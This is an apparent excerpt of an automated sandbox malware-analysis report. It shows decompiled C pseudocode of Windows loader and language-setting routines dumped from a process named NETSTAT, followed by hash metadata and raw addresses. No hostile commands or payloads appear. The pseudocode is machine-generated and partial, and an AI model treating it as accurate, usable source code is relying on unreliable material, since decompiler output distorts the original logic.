                                      									_t351 =  *0x2f585f8 & 1;
                                      									while(_t277 != 0) {
                                      										_t21 = _t277 - 0x50; // 0x74470000
                                      										_t337 =  *_t21;
                                      										if(_t337 > _t287) {
                                      											_t338 = _t337 | 0xffffffff;
                                      										} else {
                                      											asm("sbb ecx, ecx");
                                      											_t338 =  ~_t337;
                                      										}
                                      										_t387 = _t338;
                                      										if(_t387 < 0) {
                                      											_t339 =  *_t277;
                                      											__eflags = _t351;
                                      											if(_t351 != 0) {
                                      												__eflags = _t339;
                                      												if(_t339 == 0) {
                                      													goto L16;
                                      												} else {
                                      													goto L118;
                                      												}
                                      												goto L151;
                                      											} else {
                                      												goto L16;
                                      											}
                                      											goto L17;
                                      										} else {
                                      											if(_t387 <= 0) {
                                      												__eflags = _t277;
                                      												if(_t277 != 0) {
                                      													_t23 = _t277 - 0x18; // 0x3f3270
                                      													_t340 =  *_t23;
                                      													_t24 = _t277 - 0x68; // 0x3f31c0
                                      													_t353 = _t24;
                                      													_v176 = _t353;
                                      													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
                                      													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
                                      														_t279 =  *_t340;
                                      														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                      														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                      															asm("lock inc dword [edi+0x9c]");
                                      															_t30 = _t353 + 0x50; // 0x3f3270
                                      															_t340 =  *_t30;
                                      														}
                                      													}
                                      													_t31 = _t340 + 0x20; // 0x9
                                      													_v184 =  *_t31;
                                      												}
                                      											} else {
                                      												_t22 = _t277 + 4; // 0x3f3a98
                                      												_t339 =  *_t22;
                                      												if(_t351 != 0) {
                                      													__eflags = _t339;
                                      													if(_t339 == 0) {
                                      														goto L16;
                                      													} else {
                                      														L118:
                                      														_t277 = _t277 ^ _t339;
                                      														goto L17;
                                      													}
                                      													goto L151;
                                      												} else {
                                      													L16:
                                      													_t277 = _t339;
                                      												}
                                      												goto L17;
                                      											}
                                      										}
                                      										goto L25;
                                      										L17:
                                      									}
                                      									L25:
                                      									E02E7FFB0(_t287, _t353, 0x2f584d8);
                                      									_t320 = _v184;
                                      									_t342 = 0x1000;
                                      								}
                                      								if(_t353 == 0) {
                                      									break;
                                      								} else {
                                      									_t366 = 0;
                                      									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                      										_t288 = _v164;
                                      										if(_t353 != 0) {
                                      											_t342 = _t288;
                                      											_t374 = E02EBCC99(_t353, _t288, _v200, 1,  &_v168);
                                      											if(_t374 >= 0) {
                                      												if(_v184 == 7) {
                                      													__eflags = _a20;
                                      													if(__eflags == 0) {
                                      														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                      														if(__eflags != 0) {
                                      															_t271 = E02E76600(0x2f552d8);
                                      															__eflags = _t271;
                                      															if(__eflags == 0) {
                                      																_t342 = 0;
                                      																_v169 = _t271;
                                      																_t374 = E02E77926( *(_t353 + 0x50), 0,  &_v169);
                                      															}
                                      														}
                                      													}
                                      												}
                                      												if(_t374 < 0) {
                                      													_v168 = 0;
                                      												} else {
                                      													if( *0x2f5b239 != 0) {
                                      														_t342 =  *(_t353 + 0x18);
                                      														E02EEE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                      													}
                                      													if( *0x2f58472 != 0) {
                                      														_v192 = 0;
                                      														_t342 =  *0x7ffe0330;
                                      														_t361 =  *0x2f5b218; // 0x0
                                      														asm("ror edi, cl");
                                      														 *0x2f5b1e0( &_v192, _t353, _v168, 0, _v180);
                                      														 *(_t361 ^  *0x7ffe0330)();
                                      														_t269 = _v192;
                                      														_t353 = _v176;
                                      														__eflags = _t269;
                                      														if(__eflags != 0) {
                                      															_v168 = _t269;
                                      														}
                                      													}
                                      												}
                                      											}
                                      											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                      												_t366 = 0xc000007a;
                                      											}
                                      											_t247 =  *(_t353 + 0x50);
                                      											if(_t247[3] == 0xffffffff) {
                                      												L40:
                                      												if(_t366 == 0xc000007a) {
                                      													__eflags = _t288;
                                      													if(_t288 == 0) {
                                      														goto L136;
                                      													} else {
                                      														_t366 = 0xc0000139;
                                      													}
                                      													goto L54;
                                      												}
                                      											} else {
                                      												_t249 =  *_t247;
                                      												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                      													goto L40;
                                      												} else {
                                      													_t250 = _t249 | 0xffffffff;
                                      													asm("lock xadd [edi+0x9c], eax");
                                      													if((_t249 | 0xffffffff) == 0) {
                                      														E02E82280(_t250, 0x2f584d8);
                                      														_t342 =  *(_t353 + 0x54);
                                      														_t165 = _t353 + 0x54; // 0x54
                                      														_t252 = _t165;
                                      														__eflags =  *(_t342 + 4) - _t252;
                                      														if( *(_t342 + 4) != _t252) {
                                      															L135:
                                      															asm("int 0x29");
                                      															L136:
                                      															_t288 = _v200;
                                      															_t366 = 0xc0000138;
                                      															L54:
                                      															_t342 = _t288;
                                      															L02EA3898(0, _t288, _t366);
                                      														} else {
                                      															_t324 =  *(_t252 + 4);
                                      															__eflags =  *_t324 - _t252;
                                      															if( *_t324 != _t252) {
                                      																goto L135;
                                      															} else {
                                      																 *_t324 = _t342;
                                      																 *(_t342 + 4) = _t324;
                                      																_t293 =  *(_t353 + 0x50);
                                      																_v180 =  *_t293;
                                      																E02E7FFB0(_t293, _t353, 0x2f584d8);
                                      																__eflags =  *((short*)(_t353 + 0x3a));
                                      																if( *((short*)(_t353 + 0x3a)) != 0) {
                                      																	_t342 = 0;
                                      																	__eflags = 0;
                                      																	E02EA37F5(_t353, 0);
                                      																}
                                      																E02EA0413(_t353);
                                      																_t256 =  *(_t353 + 0x48);
                                      																__eflags = _t256;
                                      																if(_t256 != 0) {
                                      																	__eflags = _t256 - 0xffffffff;
                                      																	if(_t256 != 0xffffffff) {
                                      																		E02E99B10(_t256);
                                      																	}
                                      																}
                                      																__eflags =  *(_t353 + 0x28);
                                      																if( *(_t353 + 0x28) != 0) {
                                      																	_t174 = _t353 + 0x24; // 0x24
                                      																	E02E902D6(_t174);
                                      																}
                                      																L02E877F0( *0x2f57b98, 0, _t353);
                                      																__eflags = _v180 - _t293;
                                      																if(__eflags == 0) {
                                      																	E02E9C277(_t293, _t366);
                                      																}
                                      																_t288 = _v164;
                                      																goto L40;
                                      															}
                                      														}
                                      													} else {
                                      														goto L40;
                                      													}
                                      												}
                                      											}
                                      										}
                                      									} else {
                                      										L02E7EC7F(_t353);
                                      										L02E919B8(_t287, 0, _t353, 0);
                                      										_t200 = E02E6F4E3(__eflags);
                                      										continue;
                                      									}
                                      								}
                                      								L41:
                                      								if(_v157 != 0) {
                                      									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                      								}
                                      								if(_t366 < 0) {
                                      									L46:
                                      									 *_v212 = _v168;
                                      									_t204 = _t366;
                                      									L47:
                                      									_pop(_t354);
                                      									_pop(_t367);
                                      									_pop(_t289);
                                      									return E02EAB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                      								} else {
                                      									_t206 =  *0x2f5b2f8; // 0x7f0000
                                      									if((_t206 |  *0x2f5b2fc) == 0 || ( *0x2f5b2e4 & 0x00000001) != 0) {
                                      										goto L46;
                                      									} else {
                                      										_t297 =  *0x2f5b2ec; // 0x100
                                      										_v200 = 0;
                                      										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                      											_t355 = _v168;
                                      											_t342 =  &_v208;
                                      											_t208 = E02F16B68(_v168,  &_v208, _v168, __eflags);
                                      											__eflags = _t208 - 1;
                                      											if(_t208 == 1) {
                                      												goto L46;
                                      											} else {
                                      												__eflags = _v208 & 0x00000010;
                                      												if((_v208 & 0x00000010) == 0) {
                                      													goto L46;
                                      												} else {
                                      													_t342 = 4;
                                      													_t366 = E02F16AEB(_t355, 4,  &_v216);
                                      													__eflags = _t366;
                                      													if(_t366 >= 0) {
                                      														goto L46;
                                      													} else {
                                      														asm("int 0x29");
                                      														_t356 = 0;
                                      														_v44 = 0;
                                      														_t290 = _v52;
                                      														__eflags = 0;
                                      														if(0 == 0) {
                                      															L108:
                                      															_t356 = 0;
                                      															_v44 = 0;
                                      															goto L63;
                                      														} else {
                                      															__eflags = 0;
                                      															if(0 < 0) {
                                      																goto L108;
                                      															}
                                      															L63:
                                      															_v112 = _t356;
                                      															__eflags = _t356;
                                      															if(_t356 == 0) {
                                      																L143:
                                      																_v8 = 0xfffffffe;
                                      																_t211 = 0xc0000089;
                                      															} else {
                                      																_v36 = 0;
                                      																_v60 = 0;
                                      																_v48 = 0;
                                      																_v68 = 0;
                                      																_v44 = _t290 & 0xfffffffc;
                                      																E02E7E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                      																_t306 = _v68;
                                      																__eflags = _t306;
                                      																if(_t306 == 0) {
                                      																	_t216 = 0xc000007b;
                                      																	_v36 = 0xc000007b;
                                      																	_t307 = _v60;
                                      																} else {
                                      																	__eflags = _t290 & 0x00000001;
                                      																	if(__eflags == 0) {
                                      																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                      																		__eflags = _t349 - 0x10b;
                                      																		if(_t349 != 0x10b) {
                                      																			__eflags = _t349 - 0x20b;
                                      																			if(_t349 == 0x20b) {
                                      																				goto L102;
                                      																			} else {
                                      																				_t307 = 0;
                                      																				_v48 = 0;
                                      																				_t216 = 0xc000007b;
                                      																				_v36 = 0xc000007b;
                                      																				goto L71;
                                      																			}
                                      																		} else {
                                      																			L102:
                                      																			_t307 =  *(_t306 + 0x50);
                                      																			goto L69;
                                      																		}
                                      																		goto L151;
                                      																	} else {
                                      																		_t239 = L02E7EAEA(_t290, _t290, _t356, _t366, __eflags);
                                      																		_t307 = _t239;
                                      																		_v60 = _t307;
                                      																		_v48 = _t307;
                                      																		__eflags = _t307;
                                      																		if(_t307 != 0) {
                                      																			L70:
                                      																			_t216 = _v36;
                                      																		} else {
                                      																			_push(_t239);
                                      																			_push(0x14);
                                      																			_push( &_v144);
                                      																			_push(3);
                                      																			_push(_v44);
                                      																			_push(0xffffffff);
                                      																			_t319 = E02EA9730();
                                      																			_v36 = _t319;
                                      																			__eflags = _t319;
                                      																			if(_t319 < 0) {
                                      																				_t216 = 0xc000001f;
                                      																				_v36 = 0xc000001f;
                                      																				_t307 = _v60;
                                      																			} else {
                                      																				_t307 = _v132;
                                      																				L69:
                                      																				_v48 = _t307;
                                      																				goto L70;
                                      																			}
                                      																		}
                                      																	}
                                      																}
                                      																L71:
                                      																_v72 = _t307;
                                      																_v84 = _t216;
                                      																__eflags = _t216 - 0xc000007b;
                                      																if(_t216 == 0xc000007b) {
                                      																	L150:
                                      																	_v8 = 0xfffffffe;
                                      																	_t211 = 0xc000007b;
                                      																} else {
                                      																	_t344 = _t290 & 0xfffffffc;
                                      																	_v76 = _t344;
                                      																	__eflags = _v40 - _t344;
                                      																	if(_v40 <= _t344) {
                                      																		goto L150;
                                      																	} else {
                                      																		__eflags = _t307;
                                      																		if(_t307 == 0) {
                                      																			L75:
                                      																			_t217 = 0;
                                      																			_v104 = 0;
                                      																			__eflags = _t366;
                                      																			if(_t366 != 0) {
                                      																				__eflags = _t290 & 0x00000001;
                                      																				if((_t290 & 0x00000001) != 0) {
                                      																					_t217 = 1;
                                      																					_v104 = 1;
                                      																				}
                                      																				_t290 = _v44;
                                      																				_v52 = _t290;
                                      																			}
                                      																			__eflags = _t217 - 1;
                                      																			if(_t217 != 1) {
                                      																				_t369 = 0;
                                      																				_t218 = _v40;
                                      																				goto L91;
                                      																			} else {
                                      																				_v64 = 0;
                                      																				E02E7E9C0(1, _t290, 0, 0,  &_v64);
                                      																				_t309 = _v64;
                                      																				_v108 = _t309;
                                      																				__eflags = _t309;
                                      																				if(_t309 == 0) {
                                      																					goto L143;
                                      																				} else {
                                      																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                      																					__eflags = _t226 - 0x10b;
                                      																					if(_t226 != 0x10b) {
                                      																						__eflags = _t226 - 0x20b;
                                      																						if(_t226 != 0x20b) {
                                      																							goto L143;
                                      																						} else {
                                      																							_t371 =  *(_t309 + 0x98);
                                      																							goto L83;
                                      																						}
                                      																					} else {
                                      																						_t371 =  *(_t309 + 0x88);
                                      																						L83:
                                      																						__eflags = _t371;
                                      																						if(_t371 != 0) {
                                      																							_v80 = _t371 - _t356 + _t290;
                                      																							_t310 = _v64;
                                      																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                      																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                      																							_t311 = 0;
                                      																							__eflags = 0;
                                      																							while(1) {
                                      																								_v120 = _t311;
                                      																								_v116 = _t348;
                                      																								__eflags = _t311 - _t292;
                                      																								if(_t311 >= _t292) {
                                      																									goto L143;
                                      																								}
                                      																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                      																								__eflags = _t371 - _t359;
                                      																								if(_t371 < _t359) {
                                      																									L98:
                                      																									_t348 = _t348 + 0x28;
                                      																									_t311 = _t311 + 1;
                                      																									continue;
                                      																								} else {
                                      																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                      																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                      																										goto L98;
                                      																									} else {
                                      																										__eflags = _t348;
                                      																										if(_t348 == 0) {
                                      																											goto L143;
                                      																										} else {
                                      																											_t218 = _v40;
                                      																											_t312 =  *_t218;
                                      																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                      																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                      																												_v100 = _t359;
                                      																												_t360 = _v108;
                                      																												_t372 = L02E78F44(_v108, _t312);
                                      																												__eflags = _t372;
                                      																												if(_t372 == 0) {
                                      																													goto L143;
                                      																												} else {
                                      																													_t290 = _v52;
                                      																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02EA3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                      																													_t307 = _v72;
                                      																													_t344 = _v76;
                                      																													_t218 = _v40;
                                      																													goto L91;
                                      																												}
                                      																											} else {
                                      																												_t290 = _v52;
                                      																												_t307 = _v72;
                                      																												_t344 = _v76;
                                      																												_t369 = _v80;
                                      																												L91:
                                      																												_t358 = _a4;
                                      																												__eflags = _t358;
                                      																												if(_t358 == 0) {
                                      																													L95:
                                      																													_t308 = _a8;
                                      																													__eflags = _t308;
                                      																													if(_t308 != 0) {
                                      																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                      																													}
                                      																													_v8 = 0xfffffffe;
                                      																													_t211 = _v84;
                                      																												} else {
                                      																													_t370 =  *_t218 - _t369 + _t290;
                                      																													 *_t358 = _t370;
                                      																													__eflags = _t370 - _t344;
                                      																													if(_t370 <= _t344) {
                                      																														L149:
                                      																														 *_t358 = 0;
                                      																														goto L150;
                                      																													} else {
                                      																														__eflags = _t307;
                                      																														if(_t307 == 0) {
                                      																															goto L95;
                                      																														} else {
                                      																															__eflags = _t370 - _t344 + _t307;
                                      																															if(_t370 >= _t344 + _t307) {
                                      																																goto L149;
                                      																															} else {
                                      																																goto L95;
                                      																															}
                                      																														}
                                      																													}
                                      																												}
                                      																											}
                                      																										}
                                      																									}
                                      																								}
                                      																								goto L97;
                                      																							}
                                      																						}
                                      																						goto L143;
                                      																					}
                                      																				}
                                      																			}
                                      																		} else {
                                      																			__eflags = _v40 - _t307 + _t344;
                                      																			if(_v40 >= _t307 + _t344) {
                                      																				goto L150;
                                      																			} else {
                                      																				goto L75;
                                      																			}
                                      																		}
                                      																	}
                                      																}
                                      															}
                                      															L97:
                                      															 *[fs:0x0] = _v20;
                                      															return _t211;
                                      														}
                                      													}
                                      												}
                                      											}
                                      										} else {
                                      											goto L46;
                                      										}
                                      									}
                                      								}
                                      								goto L151;
                                      							}
                                      							_t288 = _v164;
                                      							_t366 = 0xc0000135;
                                      							goto L41;
                                      						}
                                      					}
                                      				}
                                      				L151:
                                      			}

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (2?$)?
                                      • API String ID: 0-183313369
                                      • Opcode ID: 76750aca64638f4eefc8c7bd458f407dcbd311856a308812e3dde24f27415c77
                                      • Instruction ID: 513420987ca039dedcd6cc7285eaa76b79b06b38266091bf211658389f0458c1
                                      • Opcode Fuzzy Hash: 76750aca64638f4eefc8c7bd458f407dcbd311856a308812e3dde24f27415c77
                                      • Instruction Fuzzy Hash: C2E1C230A80359CFEB24DF68CD80BA9B7B6BF4530CF14919DE9099B290D770A982CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E02E9FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                      				char _v5;
                                      				signed int _v8;
                                      				signed int _v12;
                                      				char _v16;
                                      				char _v17;
                                      				char _v20;
                                      				signed int _v24;
                                      				char _v28;
                                      				char _v32;
                                      				signed int _v40;
                                      				void* __ecx;
                                      				void* __edi;
                                      				void* __ebp;
                                      				signed int _t73;
                                      				intOrPtr* _t75;
                                      				signed int _t77;
                                      				signed int _t79;
                                      				signed int _t81;
                                      				intOrPtr _t83;
                                      				intOrPtr _t85;
                                      				intOrPtr _t86;
                                      				signed int _t91;
                                      				signed int _t94;
                                      				signed int _t95;
                                      				signed int _t96;
                                      				signed int _t106;
                                      				signed int _t108;
                                      				signed int _t114;
                                      				signed int _t116;
                                      				signed int _t118;
                                      				signed int _t122;
                                      				signed int _t123;
                                      				void* _t129;
                                      				signed int _t130;
                                      				void* _t132;
                                      				intOrPtr* _t134;
                                      				signed int _t138;
                                      				signed int _t141;
                                      				signed int _t147;
                                      				intOrPtr _t153;
                                      				signed int _t154;
                                      				signed int _t155;
                                      				signed int _t170;
                                      				void* _t174;
                                      				signed int _t176;
                                      				signed int _t177;
                                      
                                      				_t129 = __ebx;
                                      				_push(_t132);
                                      				_push(__esi);
                                      				_t174 = _t132;
                                      				_t73 =  !( *( *(_t174 + 0x18)));
                                      				if(_t73 >= 0) {
                                      					L5:
                                      					return _t73;
                                      				} else {
                                      					E02E7EEF0(0x2f57b60);
                                      					_t134 =  *0x2f57b84; // 0x776f7b80
                                      					_t2 = _t174 + 0x24; // 0x24
                                      					_t75 = _t2;
                                      					if( *_t134 != 0x2f57b80) {
                                      						_push(3);
                                      						asm("int 0x29");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						_push(0x2f57b60);
                                      						_t170 = _v8;
                                      						_v28 = 0;
                                      						_v40 = 0;
                                      						_v24 = 0;
                                      						_v17 = 0;
                                      						_v32 = 0;
                                      						__eflags = _t170 & 0xffff7cf2;
                                      						if((_t170 & 0xffff7cf2) != 0) {
                                      							L43:
                                      							_t77 = 0xc000000d;
                                      						} else {
                                      							_t79 = _t170 & 0x0000000c;
                                      							__eflags = _t79;
                                      							if(_t79 != 0) {
                                      								__eflags = _t79 - 0xc;
                                      								if(_t79 == 0xc) {
                                      									goto L43;
                                      								} else {
                                      									goto L9;
                                      								}
                                      							} else {
                                      								_t170 = _t170 | 0x00000008;
                                      								__eflags = _t170;
                                      								L9:
                                      								_t81 = _t170 & 0x00000300;
                                      								__eflags = _t81 - 0x300;
                                      								if(_t81 == 0x300) {
                                      									goto L43;
                                      								} else {
                                      									_t138 = _t170 & 0x00000001;
                                      									__eflags = _t138;
                                      									_v24 = _t138;
                                      									if(_t138 != 0) {
                                      										__eflags = _t81;
                                      										if(_t81 != 0) {
                                      											goto L43;
                                      										} else {
                                      											goto L11;
                                      										}
                                      									} else {
                                      										L11:
                                      										_push(_t129);
                                      										_t77 = E02E76D90( &_v20);
                                      										_t130 = _t77;
                                      										__eflags = _t130;
                                      										if(_t130 >= 0) {
                                      											_push(_t174);
                                      											__eflags = _t170 & 0x00000301;
                                      											if((_t170 & 0x00000301) == 0) {
                                      												_t176 = _a8;
                                      												__eflags = _t176;
                                      												if(__eflags == 0) {
                                      													L64:
                                      													_t83 =  *[fs:0x18];
                                      													_t177 = 0;
                                      													__eflags =  *(_t83 + 0xfb8);
                                      													if( *(_t83 + 0xfb8) != 0) {
                                      														E02E776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                      													}
                                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                      													goto L15;
                                      												} else {
                                      													asm("sbb edx, edx");
                                      													_t114 = E02F08938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                      													__eflags = _t114;
                                      													if(_t114 < 0) {
                                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                      														E02E6B150();
                                      													}
                                      													_t116 = E02F06D81(_t176,  &_v16);
                                      													__eflags = _t116;
                                      													if(_t116 >= 0) {
                                      														__eflags = _v16 - 2;
                                      														if(_v16 < 2) {
                                      															L56:
                                      															_t118 = E02E775CE(_v20, 5, 0);
                                      															__eflags = _t118;
                                      															if(_t118 < 0) {
                                      																L67:
                                      																_t130 = 0xc0000017;
                                      																goto L32;
                                      															} else {
                                      																__eflags = _v12;
                                      																if(_v12 == 0) {
                                      																	goto L67;
                                      																} else {
                                      																	_t153 =  *0x2f58638; // 0x0
                                      																	_t122 = L02E738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                      																	_t154 = _v12;
                                      																	_t130 = _t122;
                                      																	__eflags = _t130;
                                      																	if(_t130 >= 0) {
                                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                      																		__eflags = _t123;
                                      																		if(_t123 != 0) {
                                      																			_t155 = _a12;
                                      																			__eflags = _t155;
                                      																			if(_t155 != 0) {
                                      																				 *_t155 = _t123;
                                      																			}
                                      																			goto L64;
                                      																		} else {
                                      																			E02E776E2(_t154);
                                      																			goto L41;
                                      																		}
                                      																	} else {
                                      																		E02E776E2(_t154);
                                      																		_t177 = 0;
                                      																		goto L18;
                                      																	}
                                      																}
                                      															}
                                      														} else {
                                      															__eflags =  *_t176;
                                      															if( *_t176 != 0) {
                                      																goto L56;
                                      															} else {
                                      																__eflags =  *(_t176 + 2);
                                      																if( *(_t176 + 2) == 0) {
                                      																	goto L64;
                                      																} else {
                                      																	goto L56;
                                      																}
                                      															}
                                      														}
                                      													} else {
                                      														_t130 = 0xc000000d;
                                      														goto L32;
                                      													}
                                      												}
                                      												goto L35;
                                      											} else {
                                      												__eflags = _a8;
                                      												if(_a8 != 0) {
                                      													_t77 = 0xc000000d;
                                      												} else {
                                      													_v5 = 1;
                                      													L02E9FCE3(_v20, _t170);
                                      													_t177 = 0;
                                      													__eflags = 0;
                                      													L15:
                                      													_t85 =  *[fs:0x18];
                                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                      														L18:
                                      														__eflags = _t130;
                                      														if(_t130 != 0) {
                                      															goto L32;
                                      														} else {
                                      															__eflags = _v5 - _t130;
                                      															if(_v5 == _t130) {
                                      																goto L32;
                                      															} else {
                                      																_t86 =  *[fs:0x18];
                                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                      																}
                                      																__eflags = _t177;
                                      																if(_t177 == 0) {
                                      																	L31:
                                      																	__eflags = 0;
                                      																	L02E770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                      																	goto L32;
                                      																} else {
                                      																	__eflags = _v24;
                                      																	_t91 =  *(_t177 + 0x20);
                                      																	if(_v24 != 0) {
                                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                      																		goto L31;
                                      																	} else {
                                      																		_t141 = _t91 & 0x00000040;
                                      																		__eflags = _t170 & 0x00000100;
                                      																		if((_t170 & 0x00000100) == 0) {
                                      																			__eflags = _t141;
                                      																			if(_t141 == 0) {
                                      																				L74:
                                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                      																				goto L27;
                                      																			} else {
                                      																				_t177 = E02E9FD22(_t177);
                                      																				__eflags = _t177;
                                      																				if(_t177 == 0) {
                                      																					goto L42;
                                      																				} else {
                                      																					_t130 = E02E9FD9B(_t177, 0, 4);
                                      																					__eflags = _t130;
                                      																					if(_t130 != 0) {
                                      																						goto L42;
                                      																					} else {
                                      																						_t68 = _t177 + 0x20;
                                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                      																						__eflags =  *_t68;
                                      																						_t91 =  *(_t177 + 0x20);
                                      																						goto L74;
                                      																					}
                                      																				}
                                      																			}
                                      																			goto L35;
                                      																		} else {
                                      																			__eflags = _t141;
                                      																			if(_t141 != 0) {
                                      																				_t177 = E02E9FD22(_t177);
                                      																				__eflags = _t177;
                                      																				if(_t177 == 0) {
                                      																					L42:
                                      																					_t77 = 0xc0000001;
                                      																					goto L33;
                                      																				} else {
                                      																					_t130 = E02E9FD9B(_t177, 0, 4);
                                      																					__eflags = _t130;
                                      																					if(_t130 != 0) {
                                      																						goto L42;
                                      																					} else {
                                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                      																						_t91 =  *(_t177 + 0x20);
                                      																						goto L26;
                                      																					}
                                      																				}
                                      																				goto L35;
                                      																			} else {
                                      																				L26:
                                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                      																				__eflags = _t94;
                                      																				L27:
                                      																				 *(_t177 + 0x20) = _t94;
                                      																				__eflags = _t170 & 0x00008000;
                                      																				if((_t170 & 0x00008000) != 0) {
                                      																					_t95 = _a12;
                                      																					__eflags = _t95;
                                      																					if(_t95 != 0) {
                                      																						_t96 =  *_t95;
                                      																						__eflags = _t96;
                                      																						if(_t96 != 0) {
                                      																							 *((short*)(_t177 + 0x22)) = 0;
                                      																							_t40 = _t177 + 0x20;
                                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                      																							__eflags =  *_t40;
                                      																						}
                                      																					}
                                      																				}
                                      																				goto L31;
                                      																			}
                                      																		}
                                      																	}
                                      																}
                                      															}
                                      														}
                                      													} else {
                                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                                      														_t106 =  *(_t147 + 0x20);
                                      														__eflags = _t106 & 0x00000040;
                                      														if((_t106 & 0x00000040) != 0) {
                                      															_t147 = E02E9FD22(_t147);
                                      															__eflags = _t147;
                                      															if(_t147 == 0) {
                                      																L41:
                                      																_t130 = 0xc0000001;
                                      																L32:
                                      																_t77 = _t130;
                                      																goto L33;
                                      															} else {
                                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                      																_t106 =  *(_t147 + 0x20);
                                      																goto L17;
                                      															}
                                      															goto L35;
                                      														} else {
                                      															L17:
                                      															_t108 = _t106 | 0x00000080;
                                      															__eflags = _t108;
                                      															 *(_t147 + 0x20) = _t108;
                                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                                      															goto L18;
                                      														}
                                      													}
                                      												}
                                      											}
                                      											L33:
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      						L35:
                                      						return _t77;
                                      					} else {
                                      						 *_t75 = 0x2f57b80;
                                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                      						 *_t134 = _t75;
                                      						 *0x2f57b84 = _t75;
                                      						_t73 = E02E7EB70(_t134, 0x2f57b60);
                                      						if( *0x2f57b20 != 0) {
                                      							_t73 =  *( *[fs:0x30] + 0xc);
                                      							if( *((char*)(_t73 + 0x28)) == 0) {
                                      								_t73 = E02E7FF60( *0x2f57b20);
                                      							}
                                      						}
                                      						goto L5;
                                      					}
                                      				}
                                      			}

                                      0x00000000
                                      0x02edbe44
                                      0x02edbe3e
                                      0x02edbe29
                                      0x02edbe29
                                      0x00000000
                                      0x02edbe29
                                      0x02edbe27
                                      0x00000000
                                      0x02e9fba7
                                      0x02e9fba7
                                      0x02e9fbab
                                      0x02edbf02
                                      0x02e9fbb1
                                      0x02e9fbb1
                                      0x02e9fbb8
                                      0x02e9fbbd
                                      0x02e9fbbd
                                      0x02e9fbbf
                                      0x02e9fbbf
                                      0x02e9fbc5
                                      0x02e9fbcb
                                      0x02e9fbf8
                                      0x02e9fbf8
                                      0x02e9fbfa
                                      0x00000000
                                      0x02e9fc00
                                      0x02e9fc00
                                      0x02e9fc03
                                      0x00000000
                                      0x02e9fc09
                                      0x02e9fc09
                                      0x02e9fc0f
                                      0x02e9fc15
                                      0x02e9fc23
                                      0x02e9fc23
                                      0x02e9fc25
                                      0x02e9fc27
                                      0x02e9fc75
                                      0x02e9fc7c
                                      0x02e9fc84
                                      0x00000000
                                      0x02e9fc29
                                      0x02e9fc29
